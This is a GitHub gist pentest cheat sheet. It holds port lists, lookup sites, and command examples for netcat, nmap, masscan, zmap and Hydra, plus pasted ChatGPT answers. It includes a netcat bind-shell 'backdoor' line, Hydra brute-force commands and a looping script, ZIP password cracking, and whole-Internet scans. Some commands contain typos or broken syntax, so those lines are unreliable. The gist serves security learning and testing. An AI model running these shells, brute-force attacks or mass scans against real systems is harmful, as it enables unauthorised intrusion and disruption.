Skip to content

Instantly share code, notes, and snippets.

@githubfoam

githubfoam/pentest cheat sheet

Last active September 23, 2025 13:53
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save githubfoam/4d3c99383b5372ee019c8fbc7581637d to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save githubfoam/4d3c99383b5372ee019c8fbc7581637d to your computer and use it in GitHub Desktop.
Download ZIP
pentest cheat sheet
Raw
pentest cheat sheet
----------------------------------------------------------------------------------------------------
OWASP Top Ten https://owasp.org/www-project-top-ten/
The CWE Top 25
https://www.sans.org/top25-software-errors/
2022 CWE Top 25 Most Dangerous Software Weaknesses
https://cwe.mitre.org/top25/archive/2022/2022_cwe_top25.html
OSSTMM 3 – The Open Source Security Testing Methodology Manual
https://www.isecom.org/OSSTMM.3.pdf
OWASP Web Security Testing Guide
https://owasp.org/www-project-web-security-testing-guide/
----------------------------------------------------------------------------------------------------
0-1023 - Well known ports (HTTP, SMTP, DHCP, FTP etc)
1024-49151 - Reserved Ports
49152-65535 - Dynamic/Private Ports
Windows : Start → "cmd" → Run as Administrator → "netstat -bn"
Linux : a In the terminal, run the command: "ss -tln"
MAC : lsof -iTCP -sTCP:LISTEN -n -P
https://portchecker.co
https://www.yougetsignal.com/tools/open-ports/ (Scan All Common Ports)
https://www.ipfingerprints.com/portscan.php
https://www.portcheckers.com/
21: FTP (File Transfer Protocol)
22: SSH (Secure Shell)
23: Telnet (Remote Login Service)
25: SMTP (Simple Mail Transfer Protocol)
43: WHOIS Protocol obtaining the registration of ownership of domain names and IP addresses
53: DNS (Domain Name System)
67: DHCP Dynamic Host Configuration Protocol
69: TFTP Trivial File Transfer Protocol - a simple file transfer protocol.
80: HTTP (Hypertext Transfer Protocol)
110: POP3 (Post Office Protocol 3)
115: SFTP (Secure File Transfer Protocol)
123: NTP (Network Time Protocol)
135: RPC
139: NetBIOS
143: IMAP (Internet Message Access Protocol)
161: SNMP (Simple Network Management Protocol)
194: IRC (Internet Relay Chat)
389: LDAP Lightweight Directory Access Protocol.
443: SSL / HTTPS (Hypertext Transfer Protocol Secure)
445: SMB (Server Message Block)
465: SMTPS (Simple Mail Transfer Protocol over SSL)
515: LPD Line Printer Daemon. Remote printing protocol on the printer.
554: RTSP (Real Time Stream Control Protocol)
636: LDAP over SSL or Secure LDAP
873: RSYNC (RSYNC File Transfer Services)
993: IMAPS (Internet Message Access Protocol over SSL)
995: POP3S (Post Office Protocol 3 over SSL)
1080: SOCKS SOCKet Secure. Receiving protocol secure anonymous access.
1433: MSSQL
3128: Proxy Currently the port often used proxies.
3306: MySQL
3389: RDP (Remote Desktop Protocol)
5432: PostgreSQL
5631/5632: PC Anywhere
5900: VNC (Virtual Network Computing)
5938: TeamViewer - Remote control system for ensuring your computer and data exchange.
6379: Redis
7070: For direct connections, TCP Port 7070 is used for listening by default. This port is opened when installing AnyDesk.
8080: Alternate port for the HTTP protocol. Sometimes used proxies.
9001/9030: Tor commonly uses ports 9001 and 9030 for network traffic and directory information.
11211: Memcached
25565: Minecraft
44158: Helium Miner Port
----------------------------------------------------------------------------------------------------
https://www.virustotal.com #Analyse suspicious files, domains, IPs and URLs to detect malware and other breaches, automatically share them with the security communit
https://dnslytics.com/ #The ultimate online investigation tool Search for Domain, IPv4,IPv6
https://www.ipvoid.com/ #IP blacklist check, whois lookup, dns lookup, ping, and more
https://www.abuseipdb.com/
https://talosintelligence.com/ #Query by IP, domain, or network owner for real-time threat data.
----------------------------------------------------------------------------------------------------
Look up IP Address Location https://whatismyipaddress.com/ip-lookup
----------------------------------------------------------------------------------------------------
Real-time problem & outage monitoring https://downdetector.com/
----------------------------------------------------------------------------------------------------
By defanging the URLs, you can effectively deliver these links without triggering spam filters, reputation-based filters, or being quarantined. This tool ensures that your intended recipients receive the link and allows them to investigate and address any potential security concerns
https://trustifi.com/url-defang-tool/
----------------------------------------------------------------------------------------------------
#DMARC, SPF query
https://dmarcian.com/spf-survey/
https://mxtoolbox.com/SuperTool.aspx?action=mx%3atau.edu.tr&run=toolpage
----------------------------------------------------------------------------------------------------
Penetration Testing Methodologies
https://owasp.org/www-project-web-security-testing-guide/latest/3-The_OWASP_Testing_Framework/1-Penetration_Testing_Methodologies
Penetration Testing Framework 0.59
http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html
----------------------------------------------------------------------------------------------------
#ChatGPT
While I cannot provide specific website URLs or endorse any particular password list sources, I can mention some commonly used password lists for penetration testing purposes. These password lists are often used for testing weak or common passwords during security assessments:
SecLists: SecLists is a popular collection of various password lists, including common passwords, leaked passwords, default credentials, and more. It is regularly updated and widely used in penetration testing.
RockYou: RockYou is a well-known password list that gained attention after a data breach. It contains millions of commonly used passwords and is often used for password cracking and testing purposes.
CrackStation: CrackStation provides a free online password cracking tool, along with a downloadable password hash list. The hash list includes a large number of unique passwords that can be used for penetration testing.
SkullSecurity: SkullSecurity offers a range of password lists, including wordlists, username lists, and leaked password databases. These lists are frequently used in security assessments and password cracking.
Weakpass: Weakpass is a collection of password lists specifically curated for security testing purposes. It includes lists of commonly used passwords, default credentials, and leaked passwords.
When using password lists for penetration testing, it's important to ensure you have proper authorization and adhere to legal and ethical guidelines. Respect privacy and avoid using password lists that contain sensitive or personal information. Always obtain permission from the system owner or administrator before conducting any security testing activities
----------------------------------------------------------------------------------------------------
#ChatGPT
Penetration testing, also known as pen testing, is a process used to evaluate the security of a network, system or application. When it comes to performing a penetration test for a firewall, there are several steps that can be taken to ensure that the firewall is secure and functioning properly. Here's a general outline of the process:
Define the scope: Before beginning the penetration testing process, it is important to clearly define the scope of the test. This will help to identify the areas of the firewall that need to be tested, as well as any specific vulnerabilities that should be targeted.
Gather information: The next step is to gather as much information as possible about the firewall, including its configuration, rule sets, and any other relevant data. This can be done through a variety of methods, such as network scanning, port scanning, and vulnerability scanning.
Identify vulnerabilities: Once you have gathered information about the firewall, you can begin to identify potential vulnerabilities. This can be done by using various tools and techniques, such as penetration testing software and manual testing methods.
Exploit vulnerabilities: After vulnerabilities have been identified, they can be exploited to determine how they could be used to bypass or circumvent the firewall's security measures.
Document findings: As you perform the penetration testing process, it is important to document your findings in detail. This will help you to identify any issues that need to be addressed, as well as provide a clear record of the testing process for future reference.
Remediate vulnerabilities: Finally, any vulnerabilities that were identified during the testing process should be remediated as quickly as possible. This may involve reconfiguring the firewall, installing software patches, or implementing other security measures to prevent future attacks.
Overall, performing a penetration test for a firewall can help to identify potential security risks and ensure that the firewall is functioning as intended. It is important to follow a structured approach to the testing process, and to work closely with IT professionals to ensure that any vulnerabilities are addressed in a timely and effective manner.
----------------------------------------------------------------------------------------------------
#ChatGPT
There are several online WHOIS databases that you can use to query information about a domain or IP address. Here are some of the most popular ones:
ICANN WHOIS: This is the official WHOIS database maintained by the Internet Corporation for Assigned Names and Numbers (ICANN). It contains information about domain name registrations for all top-level domains (TLDs) and country code TLDs (ccTLDs).
WHOIS.net: This is a free online WHOIS database that allows you to search for domain names, IP addresses, and network blocks. It also provides information about the registrar, registrant, and administrative and technical contacts.
DomainTools WHOIS: This is a comprehensive WHOIS database that contains historical and current WHOIS records for over 350 million domain names. It also provides information about DNS and IP addresses.
WHOIS Lookup by DomainTools: This is a free online WHOIS lookup tool that allows you to search for domain names and IP addresses. It provides basic information about the domain or IP, including the registrar and registrant details.
ARIN WHOIS: This is the WHOIS database maintained by the American Registry for Internet Numbers (ARIN). It contains information about IP address assignments and allocations in North America, South America, and Sub-Saharan Africa.
RIPE WHOIS: This is the WHOIS database maintained by the Réseaux IP Européens (RIPE) Network Coordination Centre. It contains information about IP address allocations and assignments in Europe, the Middle East, and Central Asia.
APNIC WHOIS: This is the WHOIS database maintained by the Asia-Pacific Network Information Centre (APNIC). It contains information about IP address allocations and assignments in the Asia-Pacific region.
Overall, these online WHOIS databases can provide you with a wealth of information about domain names and IP addresses, including the registrar, registrant, administrative and technical contacts, and historical and current WHOIS records.
----------------------------------------------------------------------------------------------------
#linux distros
https://www.kali.org/
https://www.parrotsec.org #Raspberry Pi Images,Hack The Box Edition
https://securityonionsolutions.com/
https://blackarch.org/
https://www.backbox.org/
https://www.pentoo.ch
https://archstrike.org/
https://www.digi77.com/linux-kodachi/
https://sourceforge.net/projects/nst/files/
https://tails.boum.org/
https://www.qubes-os.org
https://sourceforge.net/projects/samurai/files/latest/download
https://remnux.org/
http://www.deftlinux.it/iso/index.html
https://www.caine-live.net/
https://tsurugi-linux.org/
https://github.com/mandiant/flare-vm
https://www.mandiant.com/resources/blog/commando-vm-windows-offensive-distribution
#SANS VMS
https://www.sans.org/tools/sift-workstation/
https://www.sans.org/tools/slingshot/
----------------------------------------------------------------------------------------------------
#regex resources
https://www.regextester.com
https://regex101.com/
https://perldoc.perl.org/perlre
----------------------------------------------------------------------------------------------------
mtr www.google.com
mtr --report google.com
mtr -4b google.com #combined IPv4 only and IP addresses
mtr -n google.com #display numeric IP addresses instead of host names
mtr -c5 google.com #limit the number of pings to a specific value
mtr -r -c 5 google.com >mtr-report #report mode using the -r flag
mtr -rw -c 5 google.com >mtr-report #wide report mode
mtr -i 2 google.com #The default interval between ICMP ECHO requests is one second
mtr --tcp test.com #use TCP SYN packets or UDP datagrams instead of the default ICMP ECHO requests
mtr --udp test.com
mtr -m 35 216.58.223.78 #maximum number of hops (default is 30)
mtr -r -s PACKETSIZE -c 5 google.com >mtr-report #set the packet size used in bytes using the -s
mtr --csv google.com #Print CSV Output
mtr --xml google.com
# find route to example.com
traceroute www.example.com
#find route to example.com using tcptraceroute (which uses tcp to discover path)
tcpdraceroute www.example.com
# The maximum number of hops can be adjusted with the -m flag.
traceroute -m 255 obiwan.scrye.net
# adjust the size of the packet that is sent to each hop by giving the integer after the hostname
traceroute google.com 70
Specify Gateway
sudo traceroute -g 10.0.2.2 yahoo.com
traceroute -g 192.5.146.4 -g 10.3.0.5 35.0.0.0
#shows the path of a packet that goes from istanbul to sanfrancisco through the hosts cairo and paris
#The -I option makes traceroute send ICMP ECHO probes to the host sanfrancisco
#The -i options sets the source address to the IP address configured on the interface qe0
traceroute -g cairo -g paris -i qe0 -q 1 -I sanfrancisco
ip r / ip route #gateway / router
ip r | grep default #default gateway
#The U flag indicates that the route is up;
#The G flag indicates that the route is to a gateway.
#The H flag indicates that the destination is a fully qualified host address, rather than a network.
route -n #Do not use protocol or host name , use IP or port number
route -V #version
route -nee #more detailed information
route -Cn #list kernel’s routing cache information
routel #list routes
routel | grep default #default gateway
Specify Source Interface
sudo traceroute -i eth0 yahoo.com
Autonomous Systems
traceroute -A yahoo.com
traceroute -I google.com
tracepath yahoo.com
tracepath -n yahoo.com
tracepath -b yahoo.com
sets the initial packet length
tracepath -l 28 yahoo.com
set maximum hops (or maximum TTLs) to max_hops
tracepath -m 5 yahoo.com
set the initial destination port to use
tracepath -p 8081 yahoo.com
----------------------------------------------------------------------------------------------------
sudo apt-get install p0f -yqq
p0f -L #LISTENING ALL THE INTERFACES
p0f -i eth0 -p -o /tmp/p0f.log # one interface and logging, -p promiscous mode
p0f -r /tmp/dump.pcap -o dump-result.log # analyze pcap file
----------------------------------------------------------------------------------------------------
#ZIP Password Cracking Windows
>zip2john.exe test.zip > test.hash #generate the hash with zip2john
>type test.hash
>john.exe --pot=test.pot --wordlist=\tmp\wordlists\Passwords\Common-Credentials\10-million-password-list-top-1000000.txt
>john.exe --pot=test.pot --show test.hash
>type test.pot
#ZIP Password Cracking Linux
zip2john test.zip > zip.hash #generate the hash with zip2john
john --wordlist=/tmp/wordlists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt zip.hash
----------------------------------------------------------------------------------------------------
#ChatGPT
The PCAP-over-IP protocol has several use cases:
Remote Network Monitoring: PCAP-over-IP can be used to remotely monitor network traffic on a specific network segment or appliance, without having to be physically present at the location of the device.
Troubleshooting: When troubleshooting network issues, it can be helpful to capture network packets in real-time. PCAP-over-IP can be used to capture and transmit network packets to a remote location where they can be analyzed by network administrators or other experts.
Compliance and Security: PCAP-over-IP can be used to capture network packets for compliance and security purposes, such as monitoring network traffic for suspicious or malicious activity.
Network Testing: PCAP-over-IP can be used for network testing and validation, by capturing and analyzing network traffic in real-time to ensure that network devices and applications are functioning properly.
----------------------------------------------------------------------------------------------------
#networkminer windows 10
#PCAP-over-IP is a method for reading a PCAP stream, which contains captured network traffic, through a TCP socket instead of reading the packets from a PCAP file
Common use cases for PCAP-over-IP include:
Transmitting captured network traffic in real time to a remote machine
Transferring network traffic between two applications on the same host
Providing decrypted traffic from a TLS interception proxy to a packet analyzer or IDS.
Software that can sniff network traffic, but doesn't support PCAP-over-IP, can read packets from a PCAP-over-IP provider with help of a netcat and tcpreplay combo.
"nc [SERVER] 57012 | tcpreplay -i eth0 -t "
"nc -l 57012 < sniffed.pcap" create a PCAP-over-IP server is to simply read a PCAP file into a netcat listener
"nc 192.168.1.2 57012 | tshark -r -" The packets in “sniffed.pcap” can then be read remotely using PCAP-over-IP
#read PCAP-over-IP with Wireshark and tshark
wireshark -k -i [email protected]:57012
tshark -i [email protected]:57012
#Live Remote Sniffing
#Sniffed traffic can be read remotely over PCAP-over-IP in real-time simply by forwarding a PCAP stream with captured packets to netcat
#Tcpdump is not available for Windows, but dumpcap is since it is included with Wireshark.
tcpdump -U -w - not tcp port 57012 | nc -l 57012
dumpcap -P -f "not tcp port 57012" -w - | nc -l 57012
----------------------------------------------------------------------------------------------------
(netcat or nc or ncat)
#Use Netcat as a Simple Web Server
vi index.html #make a simple HTML file
printf 'HTTP/1.1 200 OK\n\n%s' "$(cat index.html)" | netcat -l 8888 #
http://server_IP:8888 #access the content,serve the page, and then the netcat connection will close
"while true; do printf 'HTTP/1.1 200 OK\n\n%s' "$(cat index.html)" | netcat -l 8888; done" #have netcat serve the page indefinitely by wrapping the last command in an infinite loop
netcat -z -v domain.com 1-1000 #scan all ports up to 1000
netcat -z -n -v 198.51.100.0 1-1000 #-n flag to specify that you do not need to resolve the IP address using DNS
netcat -z -n -v 198.51.100.0 1-1000 2>&1 | grep succeeded #redirect standard error to standard output using the 2>&1 bash syntax. then filter the results with grep:
#gather more information about a service running on a system’s open port , known as banner grabbing
nc -nvv x.x.x.x 80
nc -uvz 192.168.58.9 161
nc u v w2 x.x.x.x 1-1024 #netcat used to perform a UDP scan of the lower 1024 ports
$ nc -l 8080 #listening to port 8080 for inbound connections
nc -vvul -p 9192 // listen UDP traffic
nc -vvl -p 8182 // listen TCP traffic
#listen UDP traffic on the port
$ nc -vvul -p 9192 &
[3] 24622
$ Listening on [0.0.0.0] (family 0, port 9192)
#verify netcat is listening on the port
$ nc -vuz -w 3 0.0.0.0 9192
XXXXXConnection to 0.0.0.0 9192 port [udp/*] succeeded!
$ ping 8.8.4.4 | nc -v 192.168.99.100 8182 // send traces to open a TCP port
$ ping 8.8.8.8 | nc -vu 192.168.99.100 9192 // send traces to an UDP port
// send traces to an UDP port without netcat
$ ping 8.8.4.4 > /dev/udp/192.168.99.100/9192
// send traces to a TCP port without `netcat`
$ tail -f /opt/wso2esb01a/repository/logs/wso2carbon.log > /dev/tcp/192.168.99.100/8182
$ tail -f /opt/wiremock/wiremock.log | nc -vu 192.168.99.100 9192 #WireMock is a simulator for HTTP-based APIs.
// send traces to an UDP port without `netcat`
$ tail -f /opt/wso2am02a/repository/logs/wso2carbon.log > /dev/udp/192.168.99.100/9192
$ nc -l 1234 > filename.out #Start by using nc to listen on a specific port, with output captured into a file
$ nc host.example.com 1234 < filename.in #Using a second machine, connect to the listening nc process, feeding it the file which is to be transferred
$ netcat -l 4444 > received_file #instead of printing information onto the screen, place all of the information straight into a file
$ netcat domain.com 4444 < original_file # use this file as an input for the netcat connection we will establish to the listening computer. The file will be transmitted
#On the receiving end, anticipate a file coming over that will need to be unzipped and extracted by typing
'netcat -l 4444 | tar xzvf -' #The ending dash (-) means that tar will operate on standard input, which is being piped from netcat across the network when a connection is made.
'tar -czf - * | netcat domain.com 444' # pack them into a tarball and then send them to the remote computer through netcat
$ nc -l -u 1234 #listening a udp port ‘1234’ , verify w sudo netstat -tunlp | grep 1234
$ nc -v -u 192.168.105.150 53 #send or test UDP port connectivity to a specific remote host
$ nc 192.168.1.100 80 #connection to server with IP address 192.168.1.100 will be made at port 80 & we can now send instructions
GET / HTTP/1.1 #get the page name
HEAD / HTTP/1.1 #get banner for OS fingerprinting
$ echo -n "GET / HTTP/1.0\r\n\r\n" | nc host.example.com 80 #retrieve the home page of a web site
#NC as chat tool
$ ncat -l 8080 #configure server to listen to a port & make connection to server from a remote machine on same port & start sending message
$ ncat SERVER_IP 8080 #On remote client machine
#NC as a proxy
#all the connections coming to our server on port 8080 will be automatically redirected to 192.168.1.200 server on port 80
$ ncat -l 8080 | ncat 192.168.1.200 80 #using a pipe, data can only be transferred & to be able to receive the data back
#create a two way pipe,send & receive data over nc proxy
$ mkfifo 2way
$ ncat -l 8080 0<2way | ncat 192.168.1.200 80 1>2way
$ ncat -l 8080 > file.txt #Start with machine on which data is to be received & start nc is listener mode
$ ncat 192.168.1.100 8080 --send-only < data.txt #on the machine from where data is to be copied, –send-only option will close the connection once the file has been copied
$ ncat -l 10000 -e /bin/bash #create a backdoor,‘e‘ flag attaches a bash to port 10000
$ ncat 192.168.1.100 1000 #a client can connect to port 10000 on server
$ nc -p 31337 -w 5 host.example.com 42 #Open a TCP connection to port 42 of host.example.com, using port 31337 as the source port, with a timeout of 5 seconds
$ nc -s 10.1.2.3 host.example.com 42 #Open a TCP connection to port 42 of host.example.com using 10.1.2.3 as the IP for the local end of the connection
$ nc -lU /var/tmp/dsocket #Create and listen on a Unix Domain Socket
$ nc -x10.2.3.4:8080 -Xconnect host.example.com 42 #Connect to port 42 of host.example.com via an HTTP proxy at 10.2.3.4, port 8080
$ ncat -u -l 80 -c 'ncat -u -l 8080' #all the connections for port 80 will be forwarded to port 8080
$ ncat -w 10 192.168.1.100 8080 #Listener mode in ncat will continue to run,configure timeouts with option ‘w’
$ ncat -l -k 8080 #When client disconnects from server, after sometime server also stops listening.force server to stay connected & continuing port listening with option ‘k’.
----------------------------------------------------------------------------------------------------
#when the user knows the format of requests required by the server.
#an email may be submitted to an SMTP server
$ nc localhost 25 << EOF
HELO host.example.com
MAIL FROM: <[email protected]>
RCPT TO: <[email protected]>
DATA
Body of email.
.
QUIT
EOF
----------------------------------------------------------------------------------------------------
# it is necessary to first make a connection, and then break the connection when the banner has been retrieved.
#This can be accomplished by specifying a small timeout with the -w flag
#or by issuing a "QUIT" command to the server
$ echo "QUIT" | nc host.example.com 20-30
SSH-1.99-OpenSSH_3.6.1p2
Protocol mismatch.
220 host.example.com IMS SMTP Receiver Version 0.84 Ready
----------------------------------------------------------------------------------------------------
#parallelized login cracker which supports numerous protocols to attack
hydra -L unix_users.txt -P unix_passwords.txt ssh://192.169.42.33
hydra -l user -P unix_passwords.txt ssh://192.169.42.33
hydra -l root -P root_userpass.txt ssh://192.169.42.33
hydra -L ../.. /User.txt -P ../../../Pass.txt 192.169.42.33 ssh
nmap -p 21 10.10.10.16 -> ftp 10.10.10.16
hydra -L Usernames.txt -P Passwords.txt ftp://10.10.10.16
hydra -l admin -P /usr/share/wordlists/rockyou.txt testasp.vulnweb.com http-post-form “/Login.asp?RetURL=%2FDefault%2Easp%3F:tfUName=^USER^&tfUPass=^PASS^:S=logout” -vV -f
hydra -l admin -P /usr/share/wordlists/test.txt 192.168.80.134 http-post-form “/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login” -vV -f
#ChatGPT
THC-Hydra is indeed a versatile and powerful tool for conducting brute-force attacks on various login services. However, it's essential to clarify that using it to test for the Logjam vulnerability is not a standard or recommended method. Logjam is a vulnerability related to the Diffie-Hellman key exchange in SSL/TLS, and it's typically detected and assessed differently, as explained in the previous response.
Here's an example of how THC-Hydra can be used for a more standard brute-force attack against an HTTP login page. Please note that this example is for educational purposes only and should only be performed on systems you own or have explicit permission to test.
Install THC-Hydra: You can typically install THC-Hydra on Linux using package managers like apt or yum. For example, on Debian-based systems:
bash
Copy code
sudo apt-get install hydra
Prepare a Wordlist: You need a list of possible usernames and passwords to use for the brute-force attack. You can create a simple text file containing pairs of usernames and passwords, one pair per line. For example, wordlist.txt:
plaintext
Copy code
admin:password
user:123456
john:secret
Run the Brute-Force Attack: Use THC-Hydra to perform the brute-force attack. For an HTTP login page, the command might look like this:
bash
Copy code
hydra -l admin -P wordlist.txt example.com http-post-form "/login.php:user=^USER^&password=^PASS^:Invalid login" -t 4
-l: Specify the username to start with (in this case, "admin").
-P: Specify the path to the wordlist file.
example.com: Replace this with the target website's URL.
http-post-form: Specify the login form details.
"/login.php:user=^USER^&password=^PASS^:Invalid login": Define the login form parameters, where ^USER^ and ^PASS^ will be replaced with usernames and passwords from the wordlist.
-t 4: Set the number of parallel tasks to 4 (adjust as needed).
Review the Results: THC-Hydra will attempt to log in using the usernames and passwords from the wordlist. If successful, it will display the valid credentials.
----------------------------------------------------------------------------------------------------
#ChatGPT
Certainly! Here's a bash script that loops through a passwords file in the specified directory and
runs the Hydra command with different password files
#!/bin/bash
username_list="<username list>"
passwords_directory="/path/to/SecLists/Passwords/Common-Credentials/"
port="<port>"
output_file="<output file>"
target_ip="<target IP>"
protocol="<protocol>"
# Loop through password files in the directory
for password_file in "$passwords_directory"/*; do
if [ -f "$password_file" ]; then
echo "Running Hydra with password file: $password_file"
# Run Hydra command
hydra -L "$username_list" -P "$password_file" -s "$port" -o "$output_file" "$target_ip" "$protocol"
echo "Hydra completed for password file: $password_file"
echo ""
fi
done
Make sure to replace <username list>, /path/to/SecLists/Passwords/Common-Credentials/, <port>, <output file>, <target IP>, and <protocol> with the appropriate values specific to your scenario.
Save the script in a file, e.g., hydra_script.sh, and make it executable using the command chmod +x hydra_script.sh. Then, you can run the script by executing ./hydra_script.sh in the terminal.
The script will iterate through each password file in the specified directory and execute the Hydra command with the respective password file. It will display a message before and after running Hydra for each password file.
Remember to exercise caution and ensure that you have proper authorization before using this script or conducting any security testing activities.
----------------------------------------------------------------------------------------------------
zmap -p 80 172.217.0.0/24 -o IPresults.csv #scan 255 IP addresses on a class B network
wc -l IPresults.csv #the total count of IP addresses with open port 80
zmap -p 80 10.0.2.15 -o LANresults.csv
zmap -p 10.0.0.0/16 -o LANresults.csv
#scan only 10.0.0.0/8 and 192.168.0.0/16 on TCP/80
zmap -p 80 10.0.0.0/8 192.168.0.0/16
mousepad /etc/zmap/blacklist.conf #Zmap's blacklist
zmap -B 10M -p 80 10.0.0.0/16 -o LANresults.csv #limit the bandwidth Zmap uses to 10 thousand packets per second
#scan 10,000 random addresses on port 80 at a maximum 10 Mbps
zmap --bandwidth=10M --target-port=80 --max-targets=10000 --output-file=results.csv
zmap -B 10M -p 80 -n 10000 -o results.csv
----------------------------------------------------------------------------------------------------
SYN : -mT
ACK scan : -mTsA
Fin scan : -mTsF
Null scan : -mTs
Xmas scan : -mTsFPU
Connect Scan : -msf -Iv
Full Xmas scan : -mTFSRPAU
scan ports 1 through 5 : (-mT) host:1-5
unicornscan -r30 -mT adaptercart.com #get details of open and closed ports of a website called adaptercart.
unicornscan -r33 -mT linuxhint.com #send 33 packets per second by adding -r33 –mT to indicate scan (m) using the TCP protocol.
unicornscan -r33 -mT linuxhint.com:67,420 #ports 67 and 420
unicornscan -r300 -mU linuxhint.com #scan for UDP ports
unicornscan -r30 -mT google.com # get details of open and closed ports of a website
unicornscan 216.1.0.0/8:5505 -r500 -w huntfor5505.pcap -W1 -s 192.168.100.35 #Saving results to a PCAP file
unicornscan –mU –v –I 192.168.1.1/24 #perform a UDP scan on the whole network
unicornscan -msf -v 192.168.1.1/24 #perform a TCP SYN Scan on a whole network
unicornscan -i eth1 -Ir 160 -E 192.168.1.0/24:1-4000 gateway:a
unicornscan 192.168.100.35 192.168.100.45
unicornscan 192.168.100.35
unicornscan 192.168.100.35/24:31 #Scanning Class C networks find all the IPs with port 31 open
unicornscan 192.168.1.250 –Iv #get the TTL value of corresponding ports and identify the operating system
----------------------------------------------------------------------------------------------------
masscan --regres #test whether the installation of masscan is proper
masscan -p80,8000-8100 10.0.0.0/8 2603:3001:2d00:da00::/112 #scan the 10.x.x.x subnet, and 2603:3001:2d00:da00::x subnets
masscan 10.10.10.1/1 -p80
masscan 198.134.112.244 -p443
masscan 198.134.112.240/28 -p80,443,25 #multiple ports
masscan 198.134.112.240/28 -p1000-9999 #range of ports
masscan 192.168.1.105 ‐‐top-ports 10
masscan 198.134.112.0/20 --top-ports 100 --rate 100000 > output.txt
masscan 192.168.1.105 ‐‐top-ports 10 ‐‐excludefile exclude-list.txt
masscan 10.10.10.1 -p1-50 #Multi port scan
masscan 10.10.10.1 -p1,20,80
masscan 10.10.10.1 -pU:53 #UDP scan
masscan 10.0.0.1/24 --rate 10000 -p80 #increase the speed of the scan
masscan 180.215.0.0/16 -p0-1000 --exclude=180.215.122.120 #Exclude IP
masscan 180.215.0.0/16 --exclude=180.215.122.120 -p22,23,80,443
masscan 10.0.0.0/8 -p80 --open-only #scan for only open ports
masscan 0.0.0.0/0 --excludefile 255.255.255.255 -pU:53 --banners #Gathering the server version by entering –banners
masscan 10.1.1.1/24 -p 0-65535 --rate 1000000 --open-only --http-user-agent \
"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" \
-oL "output.txt"
host google.com #gives the IP of google.com web server
masscan 216.58.196.0/24 -p80,443 #scan IPs 216.58.196.1-254
#grab banners from the IPs
#kali has IP address 192.168.1.4.specify a source IP in the 192.168.1.0/24 range
masscan 216.58.196.218 -p 80,443 --banners --source-ip 192.168.1.200 #
masscan 216.58.196.0/24 -p80,443 --output-format=xml --output-filename=test.xml #save the results into file
masscan 216.58.196.0/24 -p80,443 -oX test.xml # Wireshark,Etherape to visualize
masscan 216.58.196.0/24 -p80,443 -oX test.xml #pause scan ctrl+c
masscan --resume paused.conf #resume the scan
masscan 0.0.0.0/4 -p80 --rate 100 --offline #scan whole IP address subnets but without going into the internet.
#increase the rate gradually to 1000, 100000 one at a time and see how much the network & system can perform
#Compare the times required
masscan 0.0.0.0/4 -p80 --rate 10000000 --offline #
masscan 0.0.0.0/0 -p22 --rate 10000000
masscan 192.168.1.1 -p0-65535 #scan all the ports between 0 and 65535 on the target host
masscan 0.0.0.0/0 -p0-65535 --rate 10000000 #at full speed (10 million p/s).
masscan 0.0.0.0/0 -p0-65535 #Scanning the entire Internet is bad
masscan 0.0.0.0/0 -p0-65535 --excludefile exclude.txt #blacklist or exclude ranges
masscan 0.0.0.0/0 -p0-65535 -oX scan.xml #saves the results in an XML file
masscan -p 80 0.0.0.0/0 --excludefile IPBlacklist.list -oL result.out
#increases the rate to 100,000 packets/second
#scan the entire Internet in about 10 hours per port (or 655,360 hours if scanning all ports).
masscan 0.0.0.0/0 -p0-65535 --max-rate 100000
#Performance testing
#The bogus --router-mac keeps packets on the local network segments so that they won't go out to the Internet
masscan 0.0.0.0/4 -p80 --rate 100000000 --router-mac 66-55-44-33-22-11 #
masscan 172.217.0.0/16 --rate=1 -p80,443 --ping #an ICMP Echo request also with the scan
masscan <target> <ports> --adapter-ip <ipaddress>
masscan <target> <ports> --adapter-port <port/port-range>
#multiple instances of masscan for the same range of IPs
masscan 172.217.0.0/16 --rate=1 -p80,443 --shards 1/2 #Attacker 1 the first instance would scan the IPs with index 0
masscan 172.217.0.0/16 --rate=1 -p80,443 --shards 2/2 #Attacker 2 second instance would scan IPs with index 1
masscan -c config #sample configuration file,all the options together in 1 single config file
# Adapter
adapter-ip = 10.108.51.130
adapter-port = 5000-5127
rate = 10.00
shard = 1/1
# Targets
retries = 2
ports = 80,443,U:53,U:161
range = 172.217.0.0/16
exclude = 172.217.0.50
exclude-file /root/masscan-exclusion.list
#Output Options
output-format = xml
show = open
output-filename = google.xml
# Scan Options
banners = true
ping = true
----------------------------------------------------------------------------------------------------
#Web Content Scanner
dirb http://192.169.42.33 /usr/share/dirb/wordlists/common.txt
#web server scanner
nikto -host 192.169.42.33
#set mtu size 8
nmap --mtu 8 192.169.42.3 --packet_trace -n -p 80
nmap -p80 192.169.42.3 -oG -|nikto -h -
nmap -p0-65535 192.168.2.7
----------------------------------------------------------------------------------------------------
#To get around this, nmap can also send a TCP ACK packet to (by default) port 80.
#If the remote machine responds with a RST back, then that machine is up
#Another possibility is to send the remote machine a SYN packet and wait for an RST or a SYN/ACK
#detection
#Discovery Options
#nmap service discovery
nmap -p0-65535 --open -sV 10.10.4.59
nmap -sP 192.168.15.1 # “ping scanning,sites now block echo request packets,nmap sends out ICMP echo request packets to every IP address in a network
nmap -Pn 62.233.173.90 #Host seems down. If it is really up, but blocking our ping probes
nmap -Pn --top-ports 20 c # -Pn Don’t ping
nmap -Pn 192.168.1.0-255
#-sn,skip the port scanning,only perform host discovery.
#-PS,use a TCP SYN ping scan
nmap -sn -PS 192.1.1.1/24
nmap -PA 192.168.1.0-255 # -PA TCP ACK ping
nmap -PU 192.168.1.0-255 # -PU UDP ping
nmap -sn -PY scanme.nmap.org #SCTP Init Ping,determine whether a host is online by sending SCTP INIT packets and looking for ABORT or INIT ACK responses
nmap -PE 192.168.15.1 #ICMP echo ping,
nmap -sP -PE --disable-arp-ping 192.168.56.1 # ICMP echo ping local network
nmap -PE -sn 192.168.0.16
nmap -PP 10.10.4.59 #-PP option performs an ICMP timestamp ping
nmap -PP --disable-arp-ping 10.10.4.59 # local network
nmap -PM --disable-arp-ping 10.10.4.59 # -PM option performs an ICMP address mask ping, local network
nmap -PO 192.168.1.1 # do not ping before scanning,many sites now block/filter the ping echo request packets
nmap -PO1 10.10.3.1 #-PO option performs an IP protocol ping,the default protocols 1 (ICMP), 2 (IGMP), and 4 (IP),-PO1,2,4,etc
